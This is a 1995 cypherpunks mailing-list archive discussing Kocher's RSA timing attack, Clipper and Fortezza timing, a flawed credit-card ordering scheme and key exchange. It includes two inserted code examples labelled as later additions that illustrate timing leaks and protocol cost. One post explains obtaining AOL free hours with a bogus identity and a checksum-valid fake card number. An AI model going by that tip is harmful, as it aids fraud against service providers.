for a long time.  I understand that NSA cryptosystems have long required
fixed response time for some (but not all...) cryptographic primitives in
comsec equipment.  But understanding that timing information might be
a threat in principle is not the same as understanding how to exploit it
in practice.

Kocher's observations are very, very surprising.

-matt
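
The bit-density leak mentioned above, together with a padding defense in the spirit of the "quantization" entry in the CryptoLib announcement, as an added example that is not CryptoLib's code and not part of the original post. It assumes quantization means padding the cost of an operation up to the next multiple of a fixed quantum, and it counts modular multiplications instead of reading a clock; all names and sample exponents are constructed.

```c
#include <stdint.h>
#include <stdio.h>

#define EXP_BITS 32

typedef struct {
    uint32_t value;  /* base^exp mod m */
    unsigned mults;  /* modular multiplications performed: the cost proxy */
} powres;

/* Left-to-right square-and-multiply over a fixed 32-bit exponent width.
 * Every bit costs one squaring; every 1 bit costs one extra multiply, so
 * the total is EXP_BITS + popcount(exp) even when each individual
 * multiply takes constant time. */
static powres modpow_counted(uint32_t base, uint32_t exp, uint32_t mod)
{
    powres r = { 1u % mod, 0 };
    uint64_t b = base % mod;

    for (int i = EXP_BITS - 1; i >= 0; i--) {
        r.value = (uint32_t)(((uint64_t)r.value * r.value) % mod);
        r.mults++;
        if ((exp >> i) & 1u) {
            r.value = (uint32_t)(((uint64_t)r.value * b) % mod);
            r.mults++;
        }
    }
    return r;
}

/* Assumed model of quantization: the operation does not return until the
 * next multiple of `quantum` cost units, so an observer sees only the
 * padded cost. */
static unsigned quantize(unsigned cost, unsigned quantum)
{
    return ((cost + quantum - 1) / quantum) * quantum;
}

/* Constructed sample exponents with different bit densities. */
static const uint32_t SAMPLE_EXPS[] = {
    0x00000001u, 0x00010001u, 0x0F0F0F0Fu, 0x7FFFFFFFu, 0xFFFFFFFFu
};
#define N_SAMPLES (sizeof SAMPLE_EXPS / sizeof SAMPLE_EXPS[0])

/* How many different costs can an observer tell apart across the samples? */
static unsigned distinct_observed_costs(unsigned quantum)
{
    unsigned seen[N_SAMPLES];
    unsigned n = 0;

    for (size_t i = 0; i < N_SAMPLES; i++) {
        unsigned c = quantize(
            modpow_counted(7, SAMPLE_EXPS[i], 1000003u).mults, quantum);
        unsigned j = 0;
        while (j < n && seen[j] != c)
            j++;
        if (j == n)
            seen[n++] = c;
    }
    return n;
}

int main(void)
{
    const unsigned quanta[] = { 1, 16, 64 };

    for (size_t q = 0; q < sizeof quanta / sizeof quanta[0]; q++) {
        printf("quantum %2u:", quanta[q]);
        for (size_t i = 0; i < N_SAMPLES; i++) {
            powres r = modpow_counted(7, SAMPLE_EXPS[i], 1000003u);
            printf(" %u->%u", r.mults, quantize(r.mults, quanta[q]));
        }
        printf("  (%u distinguishable)\n",
               distinct_observed_costs(quanta[q]));
    }
    return 0;
}
```

With a quantum of 16 the five exponents still fall into two buckets; only a quantum at least as large as the worst-case cost (64 here) makes them indistinguishable.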





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 14 Dec 1995 14:23:12 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: Attacking Clipper with timing info?
In-Reply-To: <9512140222.AA23036@bilbo.suite.com>
Message-ID: <199512140531.AAA23535@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> That was indeed what I was wondering.  I expect we won't have to wait too  
> long before we hear whether Clipper chips require the same or a different  
> amount of time to encrypt/decrypt.  Should be interesting.
>
Clipper chips require fixed time to do a codebook cipher operation (exactly
64 clock ticks).  It's in the chip spec.

Capstone chips, on the other hand (as embodied in Tessera/Fortezza) have
public-key operations (DSA and a classified key exchange algorithm called
KEA that appears based on its interface to be El Gamal-like).  The cards
aren't supposed to reveal the secrets stored on them, ever.  There does
appear to be some variability in those functions, however.  I've not yet
reached any firm conclusions, however.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darrell Fuhriman <darrell@teleport.com>
Date: Thu, 14 Dec 1995 23:42:59 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: And the standard continues to lower...
In-Reply-To: <199512140038.BAA02939@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951214010119.19728A-100000@claudia.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


> >http://www.bluewaterp.com/~bcrissey/

Oh no.. It's not... 

# nslookup www.bluewaterp.com
Server:  sandra.teleport.com
Address:  192.108.254.11

Name:    www.teleport.com
Addresses:  192.108.254.16, 192.108.254.17, 192.108.254.18
Aliases:  www.bluewaterp.com

Ack!  it is!! Oh no..

> The scheme is to send 4 digits of the credit card at a time. The
> "explanation" follows.

I've had a little chat with the web people downstairs about this.  I 
don't know what they were thinking when they gave this guy permission to 
run this..

I thought about sticking a packet sniffer on the network, and sending him 
all his "secure" transactions.

I'm going to look over the code for obvious problems (heh heh that's an
understatement), but a cursory glance leads me to think it's an entry in
the Annual Poor Code Formatting contest. 

Ugh.. I'm so embarrassed.

Darrell Fuhriman
Teleport System Administration





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Thu, 14 Dec 1995 23:41:17 +0800
To: cypherpunks@toad.com
Subject: Kocher's RSA attack
Message-ID: <rschlafly3480927310>
MIME-Version: 1.0
Content-Type: text/plain



I read Kocher's paper, but I question its applicability.  One of his
premises is that the time of a modular multiplication varies with
the data.  I've checked my code for modular multiplication, and
the clock cycles to execute don't depend on the data at all.  The
same instructions get executed, and assuming the processor has a
hardware multiply, they take the same time.

When I timed the modular multiplication, I was able to detect some
slight variation, but I attribute this to cache misses, as the variance
with the same data was the same as the variance with different data.

Apparently RSAREF has modular multiplies which vary significantly
with the data, but I maintain this is not necessary.

A good test case for his analysis might be to pull a secret key
from a smart card.  If, say, the Capstone chip modular multiplication
has some timing anomalies, this might be a good way to defeat the
Fortezza card.

Roger Schlafly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 14 Dec 1995 11:00:15 +0800
To: cypherpunks@toad.com
Subject: Re: And the standard continues to lower...
Message-ID: <199512140038.BAA02939@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>If the misuse of "One Time Pad" wasn't enough for ya, check out this ad that
>I was e-mailed.
>
>And the chair of a CS department, no less.
>
>- ------- start of forwarded message (RFC 934 encapsulation) -------
>Subject: Secure No-overhead Online Order System for Publishers
>Date: Wed, 13 Dec 1995 12:24:03 -0800 (PST)
>
>A secure no-overhead online title-ordering system is now available. It may
>be viewed in operation at the home page for Blue Water Publishing, a
>publisher, software developer and distribution company, at
>http://www.bluewaterp.com/~bcrissey/
>or from the online bookstore area of ISCNI, the Institute for the Study of
>Contact with Non-Human Intelligence at
>http://www.iscni.com
>
>Blue Water's innovative online ordering system is called SimplySafe. It is
>a needle-in-the-haystack approach to online security.  It requires no
>encryption or secure servers, yet the probability that a dedicated hacker
>scanning 100 internet messages a second will intercept a usable credit
>card number sent via SimplySafe is less than the probability of picking
>our Sun out of the Milky Way.  That is less than 1 in 200 billion.  Safe
>enough for most folks.  There are easier ways for a hacker to pick up
>credit card numbers than to waste time with SimplySafe transactions.  Try
>it out!
>
>SimplySafe currently supports secure online orders from Blue Water
>Publishing, Wild Flower Press, Swan-Raven & Co., and ISCNI.
>Direct inquiries to
>SimpleSafe@aol.com
>
>***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
>(503)-434-2426 brianc@linfield.edu
>Professionals built the Titanic, amateurs built the Ark...

The scheme is to send 4 digits of the credit card at a time. The
"explanation" follows.

>In order to proceed with your SimplySafe(r) encryption of your credit card
>number, please enter the SECOND set of (4) digits of your credit card number:
>
>In the 41 seconds since you sent your first packet of four digits,
>approximately 2869959 packets of information have passed across the internet.
>Assuming that a hacker can scan 100 packets of information per second for
>credit card information, there is 1 chance in 699 that he has scanned your
>first packet of digits.
>He is unlikely to have found anything useful.

Sigh.

Wilhelm Busch

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 16 Dec 1995 07:42:44 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Attacking Clipper with timing info?
In-Reply-To: <9512140458.AA25132@bilbo.suite.com>
Message-ID: <199512140807.DAA19083@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jim Miller writes:
> That brings up an issue I occasionally think about...At what point does  
> NSA's secrecy become more of a liability than an asset.  Should the NSA  
> reveal flaws in crypto-systems in wide use here in the US to protect US  
> companies and individuals from attack or should they remain quiet so they  
> can exploit them in the interests of national security?

As usual, I speak at most for myself. But I think it's pretty safe to say
that most people here believe the privacy interests of individuals (and
companies) outweigh the allegedly conflicting "national security" interests
of the countries in which we reside. A great deal has been written (more
eloquently) on this point. The NSA doubtless believes it has a "national
security" interest in knowing the contents of my communications with my very
good friend in the USAF. I strenuously disagree. This is one of the reasons
I devote so much of my time to, er, cypherpunking :)

(It has also been noted by many before me that preserving the privacy of U.S.
entities is a significant national security interest in and of itself.)

-Futplex <futplex@pseudonym.com>
"The guys in the powdered wigs had it about right in 1792, and there's good
reason why in 200-plus years we have not amended the Bill of Rights, which is
what this legislation would do." -White House Press Secretary Michael D. 
McCurry, commenting on the Administration's position on the proposed flag
desecration amendment to the U.S. Constitution




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Dec 1995 17:06:49 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem
In-Reply-To: <199512121533.JAA21358@cdale1.midwest.net>
Message-ID: <199512140825.DAA19241@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dave writes:
> Disregarding the "quantum properties of light" issue, if Eve can listen
> in on every communication between Alice and Bob about their keys, then
> doesn't she have enough information to reconstruct the key herself?

By "disregarding the quantum properties", I assume you are asking about
deterministic cryptosystems. Eve does not have sufficient information if 
Alice and Bob use, say, Diffie-Hellman key exchange (DH). As I said, that's
why DH is so clever. :)  (cf. any good crypto text)  But that's patented
(for now), and we were asked about a patent-free solution.

-Futplex <futplex@pseudonym.com>
"We live in a time when...individual rights are constantly expanded" -Sen. 
Orrin Hatch (R-UT), speaking in support of an anti-flag-desecration 
Constitutional amendment




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Dec 1995 18:46:29 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem
In-Reply-To: <199512130413.XAA04532@pipe4.nyc.pipeline.com>
Message-ID: <199512140944.EAA18499@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


tallpaul writes:
> Alice says to Bob, in front of all of the other people on the elevator: "I
> have generated a large(ish) amount of large(ish) prime numbers and have
> recorded all of them. I have multiplied two of the numbers to get an even
> larger non-prime number. I have done this a large(ish) number of times
> until I have a 'large(ish)/2' set of non-prime numbers. The elements of
> this set are [Alice reads off the set of non-prime numbers and Bob along
> with the other people on the elevator record them.] Bob, go home and pick
> one of the non-prime numbers in the set. Factor it. Use the largest prime
> as a private key in your message to me. Since I know what the numbers all
> are, I'll try all of them to see which one decrypts your message." 
>  
> Bob has to factor one large(ish) prime. 
>  
> Alice has to *try* an average of "large(ish)/2" private keys to decrypt
> Bob's message. 
>  
> The other people on the elevator have to *factor* an average of
> "large(ish)/2/2" number of large(ish) numbers to decrypt the message. 
>  
> The *relative* security then depends on the number of digits in the
> large(ish) primes and the number of products in the set Alice reads to Bob.
>
[...example with a set of 2 * 10^6 primes...elided]

I think there are two main (related) problems with this protocol:

(1) It does not offer great security. The time required for a brute force 
attack is only linear in the time required to execute the protocol. So Alice 
will want to start out with an enormous number of primes (the linear factor). 
Even so, the attacker's job is relatively easy.

(2) It is rather impractical. The time required to execute the protocol is
prohibitive (assuming Alice uses a huge number of primes). 

Consider the numbers in your example. Alice generates N = 2*10^6 large primes 
and transmits the 10^6 pair products -- that's on the order of .1 gigabits, or
about 12 megabytes, to transmit (assuming products around 100 bits long, so
Bob can factor one before the heat death of the universe). Bob factors one of 
the products, which should take a while for all this to be at all worthwhile.
Let's say it takes Bob approximately an hour to factor.

This will take too long to do online. Alice and Bob won't generate new keys 
for each session this way. But to limit the chance that Eve can start to 
decrypt their communications in real time to 10%, if Eve has 100
times the computing power of Bob, they'll need to negotiate a new key every
6 weeks or so. This is not so hot.

Comments ?

-Futplex <futplex@pseudonym.com>
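
The cost argument in the reply above, as an added Python example (not code from the thread): a toy run of the protocol that counts each party's work, plus the transmission and re-keying arithmetic for the N = 2*10^6 case. The tiny prime range, trial-division factoring, the HMAC key check standing in for "this key decrypts the message", and the reading of the 10% figure as k/products are assumptions made here.

```python
"""Toy model of the 'list of semiprimes' key agreement (added illustration)."""
import hashlib
import hmac
import random


def primes_between(lo, hi):
    """Sieve of Eratosthenes: primes p with lo <= p < hi."""
    sieve = bytearray([1]) * hi
    sieve[0:2] = b"\x00\x00"
    for i in range(2, int(hi ** 0.5) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(range(i * i, hi, i)))
    return [p for p in range(lo, hi) if sieve[p]]


def factor(n):
    """Trial division of an odd semiprime: the unit of hard work for Bob and Eve."""
    d = 3
    while d * d <= n:
        if n % d == 0:
            return d, n // d
        d += 2
    raise ValueError("no odd factor found")


def tag(prime, message):
    """Assumed key check: HMAC-SHA256 under a key derived from the candidate prime."""
    key = hashlib.sha256(str(prime).encode()).digest()
    return hmac.new(key, message, hashlib.sha256).digest()


def run_protocol(num_primes, rng):
    """One run with num_primes (even) toy primes; returns each party's work and key."""
    primes = rng.sample(primes_between(1_000, 10_000), num_primes)
    products = [primes[i] * primes[i + 1] for i in range(0, num_primes, 2)]
    message = b"constructed sample message"

    # Bob: a single factorization, then he keys on the larger prime factor.
    bob_key = max(factor(rng.choice(products)))
    bob_tag = tag(bob_key, message)

    # Alice: no factoring, only cheap key trials over the primes she recorded.
    alice_trials, alice_key = 0, None
    for p in primes:
        alice_trials += 1
        if hmac.compare_digest(tag(p, message), bob_tag):
            alice_key = p
            break

    # Eve: heard every product; factors them in random order until one fits.
    order = list(products)
    rng.shuffle(order)
    eve_factorizations, eve_key = 0, None
    for n in order:
        eve_factorizations += 1
        candidate = max(factor(n))
        if hmac.compare_digest(tag(candidate, message), bob_tag):
            eve_key = candidate
            break

    return {
        "products": len(products), "bob_key": bob_key,
        "alice_key": alice_key, "alice_trials": alice_trials,
        "eve_key": eve_key, "eve_factorizations": eve_factorizations,
    }


def mean_eve_factorizations(num_primes, runs, seed):
    """Average Eve work over several runs; the expected value is about products/2."""
    rng = random.Random(seed)
    counts = [run_protocol(num_primes, rng)["eve_factorizations"] for _ in range(runs)]
    return sum(counts) / runs


def transmit_bits(num_primes, product_bits):
    """Bits Alice must send: one product per pair of primes."""
    return (num_primes // 2) * product_bits


def rekey_interval_seconds(num_primes, bob_factor_seconds, eve_speedup, max_break_prob):
    """Time for Eve's success probability to reach max_break_prob.

    After k factorizations in random order Eve has hit Bob's product with
    probability k / products, so k = max_break_prob * products.
    """
    eve_seconds_each = bob_factor_seconds / eve_speedup
    return max_break_prob * (num_primes // 2) * eve_seconds_each


if __name__ == "__main__":
    print(run_protocol(100, random.Random(1995)))
    print("megabytes to transmit:", transmit_bits(2 * 10**6, 100) / 8 / 1e6)
    weeks = rekey_interval_seconds(2 * 10**6, 3600, 100, 0.10) / (7 * 86400)
    print("re-key every %.1f weeks" % weeks)
```

Eve's work grows only in proportion to the number of products Alice reads out, which is the linear gap the reply points to.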




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: awestrop@nyx10.cs.du.edu (Alan Westrope)
Date: Thu, 14 Dec 1995 20:59:11 +0800
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, 12/17, 2 pm
Message-ID: <OKB0wo9g/o8d085yn@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As usual, we'll begin at the Tivoli, near the downtown Auraria campus
(send email for directions).  Weather permitting, we'll have Yet Another
Demonstration of the Peripatetic Cypherpunks Protocol (patent pending),
visiting Lower Downtown's restaurants, saloons, libraries, the Tattered
Cover Bookstore, whatever...

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Dec 1995 19:37:32 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP Interoperability?
In-Reply-To: <9512141007.AA00520@commtouch.co.il>
Message-ID: <199512141052.FAA19291@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


You should ask these questions somewhere like alt.security.pgp, if anywhere.
I'll give a two bit answer ;)

Geoff Klein writes:
> Is it legal for a US citizen to encrypt or check signatures with a 2.6ui 
> public key ?

Yes.

> Would sending a public key out of the US be regarded as export by ITAR?

No (that is, the ITAR place no restrictions on such actions).

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 15 Dec 1995 00:34:28 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: ADDRESS DATABASE?
Message-ID: <Pine.SUN.3.91.951214074025.13177C-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Something of privacy interest happened to me yesterday.  I phoned
a company to ask for a copy of their catalog.  The phone clerk
asked for my last name and zip code.  After receiving that info,
the clerk asked me, "Is this your full name and address?" and
then gave them both correctly.  I was taken aback.

I have been at my new address for only a couple of months.  Prior
to that, I have been couch surfing for a year and a half.  Though
I called an 800 number, ANI had nothing to do with it since I was
calling from work.  It may have been from a database associated
with a credit reporting agency, a bank or a utility company, but
I am not aware of any of these being available on-line for 
something as mundane as requesting a consumer catalog.  The clerk 
had no idea where the info came from (or so he said).  Does 
anyone know how this trick was done?


 S a n d y

P.S.  If anyone is interested in helping to make an adult
      film, drop me a note.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Fri, 15 Dec 1995 01:23:58 +0800
To: cypherpunks@toad.com
Subject: Kocher's Paper
Message-ID: <C282ZWBQBTJZ0*/R=REN/R=HOSP/U=SADLER_C/@MHS.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


    
    Hi...
    
    Can someone tell me where I can get a copy of Kocher's paper? I haven't 
    read it yet.
    
    Thanks!
    
    Connie
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Thu, 14 Dec 1995 22:12:19 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Netscape announces position against GAK
Message-ID: <01HYSHEGJFMA94GEQ2@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

TM> I for one am satisfied--and even pleased--with the Netscape
TM> position on GAK.

TM> It remains to be seen how steadfast Netscape, as the major player in
TM> the Web browser business, remains in the face of (likely) pressure
TM> from the government.

i'm not entirely satisfied with netscape's response, but then, i
didn't expect to be. i _expect_ weaseling from corporations that have
made the 'big time'. this is the way life is i suppose. what i'd like
to see would be more companies that have an interest in the security
of net-based transactions in their best interest, (which would be any
company that intends to do any business on the net) come out
_forcefully_ for strong crypto. the ability of hackers to penetrate
the computers of the net would be greatly curtailed by universal
crypto. is there not a strong national interest in the integrity of
the net in general and financial interactions in particular? looking
forward, which politicians and bureaucrats are loath to do, commerce
and corporate dealings across the net will only increase. what we
need to do is get large corporations to recognise that privacy is
important to _them_. of course, many already know that privacy is
important to them. why else would we have a body of law concerning
"trade secrets"? i work for a fairly large corporation. this makes
finding who to talk to about this difficult. i'm working on it
though. 

perhaps some of you out there can consider ways to convince those in
positions of authority in your company to realize that crypto
technology works toward their own best interest. they _must_ speak to
this because it is business that runs this world of ours.

TM> It seems to me that we have have been quick to criticize
TM> Netscape--which is good, the quickness part--and thus we should be
TM> equally quick to praise them. To be sure, various of us might've
TM> written the Netscape position statement slightly differently, but
TM> this does not change the basic point:  that Netscape has come out
TM> against the Administration's position on GAK.

TM> For this they deserve our praise.

indeed. netscape deserves praise for including 128-bit encryption in
their products in the first place. while i'd like to see them stand
up and tell big brother to fuck off and die, i am appreciative of
what they've done so far. i'd like to see a representative of
netscape on nightline or the nightly news hold up a floppy and say
"this floppy contains an encryption program that the u.s. government
will not let us export. it was downloaded from the internet for free
by an executive of a multinational corporation based in germany who
wanted to know why i couldn't sell him a program that was as
cryptologically secure as it is. my answer was that the u.s.
government will not let me."

similar demonstrations of the lunacy of itar are left to your
imagination.

============================
these views are my own. no 
one else in their right mind
would hold them.

amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
Current PGP Key = 57957C9D
December 13, 1995   18:51






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Fri, 15 Dec 1995 01:32:22 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <9512141637.AA11479@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:42 PM 12/14/95 +0100, Lars Johansson wrote:

>>Does the attack work for existing smartcards?

>At first glance, smart cards would seem to be the most critical target
>to Kocher's timing attack since they usually operate in on-line
>environments.

Not just on-line, they also operate in untrusted (hostile?) 
environments.

>...the terminal could get a (noisy) measure of the time by 
> repeatedly using this command to see when the result is available.

Might a terminal also be able to monitor power consumption or 
electromagnetic emissions to obtain a more precise time estimate?

>Most smart cards do nevertheless require that the user must first
>specify a PIN code before the RSA algorithms are operational.

If I used my RSA card every day, (at a toll booth, for instance), and 
the "bad guys" pilfered an "exact" timing upon each use, how long before 
they could forge a signature?

>This implies that even if the card gets stolen, it can't be attacked
>with Kocher's method.

That is useful, but if I know my card is stolen, I can presumably limit 
my liability by reporting it.  If I still have my card, but my secret 
key is stolen, then damage might be greater.


On another note, timing attacks would not seem to work against 
most DES implementations,  hardware or software.  The time to execute 
each round does not seem to depend on the plaintext or the key.  It could 
be made to, of course, but unless I'm missing something, the "natural" way to 
code it, or to construct hardware for it, is not time dependent.  










Rick F. Hoselton  (who doesn't claim to present opinions for others)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Thu, 14 Dec 1995 18:51:15 +0800
To: trei@process.com
Subject: Re: NT Password Security Update.  Registry values changed!
In-Reply-To: <9512131601.AA04595@toad.com>
Message-ID: <30CFF261.6AE8@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:

> Andy, do you have Administrator privs on your NT system? I too seem
> to have full access to all registry entries, including all under Security.

Whoops, it seems that I had auto-refresh switched off in regedt32 so I didn't
see the immediate effect of my changes.  Yes I can see them now, time to
investigate the SAM subkey I think.


Regards,

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dreschs@austnsc.tandem.com (Sten Drescher)
Date: Fri, 15 Dec 1995 01:35:21 +0800
To: "Jonathan M. Bresler" <jmb@FreeBSD.ORG>
Subject: Re: kocher's timing attack
In-Reply-To: <Pine.BSF.3.91.951213191608.19857D-100000@Aspen.Woc.Atinc.COM>
Message-ID: <55loofy5qn.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


On Firewalls, "Jonathan M. Bresler" <jmb@FreeBSD.ORG> said:

JMB> regarding kocher's timing attack paper:

JMB> RSA attack.  only known ciphertext is needed.  dont know how many
JMB> known ciphertexts are required (related to key size surely).  the
JMB> paper's example is digital signature, rephrase that to Alice signs
JMB> Bob's public key certifying that (you know the story).  After
JMB> several large key signing parties hundreds of known ciphertexts
JMB> could have been generated using Alice's key--each one a public key
JMB> of someone else.  over several years it piles up.  the known
JMB> ciphertexts can be tested/analyzed to yield Alice's secret key.
JMB> ouch.  ;/

	Are you sure about this?  It would seem that the same principle
would then apply to signed messages as well, and I find it a bit hard to
believe that signing messages would make one's key pair vulnerable.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Fri, 15 Dec 1995 00:26:33 +0800
To: cypherpunks@toad.com
Subject: Question about the Timing Attack
Message-ID: <Pine.SUN.3.91.951214104857.4717A-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,
  I have looked over the paper, but I will look more closely this weekend 
(finals going on right now).
  The main question I have, since my programs run over a network with 
dumb terminals is this: If someone can get the timing information why 
would they need it, since they can read the message.  So how can this 
attacker get the timing info without being able to read the message 
(unencrypted)?
  Thanx.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 15 Dec 1995 04:00:43 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <199512140742.XAA06927@ix13.ix.netcom.com>
Message-ID: <Pine.ULT.3.91.951214104824.5962B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Dec 1995, Bill Stewart wrote:

> <andrew_loewenstern@il.us.swissbank.com> wrote:
> 
> >I believe C2.org already offers non-dialup access accounts, paid for  
> >with ECash, that do not require a valid snail-address or phone-number.  
> >I am sure that there will be many more to come.
> 
> I suspect Sameer would be happy to open an account paid in advance in
> small unmarked bills.  AOL probably wouldn't.

AOL will, however, accept a bogus name, address, and credit card number
(as long as the checksum is correct) for the initial ten free hours plus
however long it takes for the first bill to bounce. 

America "On Line" will also accept direct debits from an untraceable bank
account (for this they charge a little extra). 

This is not to say that I have tried any of this (though I have), nor is
it to say that anything on AOL is worth your time anyway. 

> Fortunately, the government
> hasn't really caught on to the importance of email, so they aren't requiring
> that email providers know where you really live.  I predict 1997 for that.

This promises to be an interesting legal fight.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William McVey <wam@fedex.com>
Date: Fri, 15 Dec 1995 02:46:44 +0800
To: cypherpunks@toad.com
Subject: Digital Sigs and the Bar Committee
Message-ID: <199512141730.AA09473@gateway.fedex.com>
MIME-Version: 1.0
Content-Type: text/plain


This was found on Netwatchers (http://www.ionet.net/~mdyer/front.shtml), and 
I figured there would be people on this list willing to comment.

  -- William McVey

BAR COMMITTEE PROPOSES DIGITAL SIGNATURE GUIDELINES

The Information Security Committee of the Science and 
Technology Section of the American Bar Association has 
promulgated proposed Digital Signature Guidelines, and 
is inviting comment through January 15, 1996.  You can 
download the compressed ASCII file at the NetWatchers site, 
subject to the copyright notice below, or you can download 
the text in various formats from the ECL site at
http://www.intermarket.com/ecl/.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 15 Dec 1995 03:35:34 +0800
To: rschlafly@attmail.com (Roger Schlafly)
Subject: Re: Kocher's RSA attack
In-Reply-To: <rschlafly3480927310>
Message-ID: <9512141640.AA22375@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Further to Roger's comments that modular multiplies in software probably do
not allow the timing attacks.

On the internet the randomness introduced by the network probably hides
the timing of the cryptography. I say probably because I am at a conference
and have not got the maths texts to hand. I would guess however that
Shannon's paper on communications bandwidth and some empirical results on
the timing characteristics of the network would allow one to demonstrate that
the attack is infeasible.

On the other hand the attack is quite likely to work against some smart
cards. In particular there are many which do not have specialized modular
multiplication facilities. These use software to implement bignum arithmetic. 
Since smartcards also tend to be slow processors the arithmetic may well have
been speeded up in an RSAREF type manner.

A conclusion which might be reached is that smartcards should in future
contain a timer which is started at the beginning of every cryptographic
operation and a delay loop introduced to ensure that the time taken is always
the same. The alternative of attempting to ensure that equal processing is
spent on each cycle threatens an infinite regress into second and third order
effects, eg frequency of page faults. Covert channel analysis is bad enough
as it is.

Perhaps we should concentrate on the question of how the timing attack might be used
in a workstation environment. Here covert channels are very relevant - with the
proviso that we do not have a process concealment problem but a security 
partitioning problem. Consider the problem of a cryptographic file store where
the users do not have access to a private key used to make files accessible.

I suggest that we attempt to break out these attacks into categories, label 
the categories and produce a companion guide to the attack paper describing its
system level implications. I believe that such a task is best done in 
a collaborative medium such as this list. We need as many people as possible to
consider the possible attack modes. Nobody is likely to think of them all.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
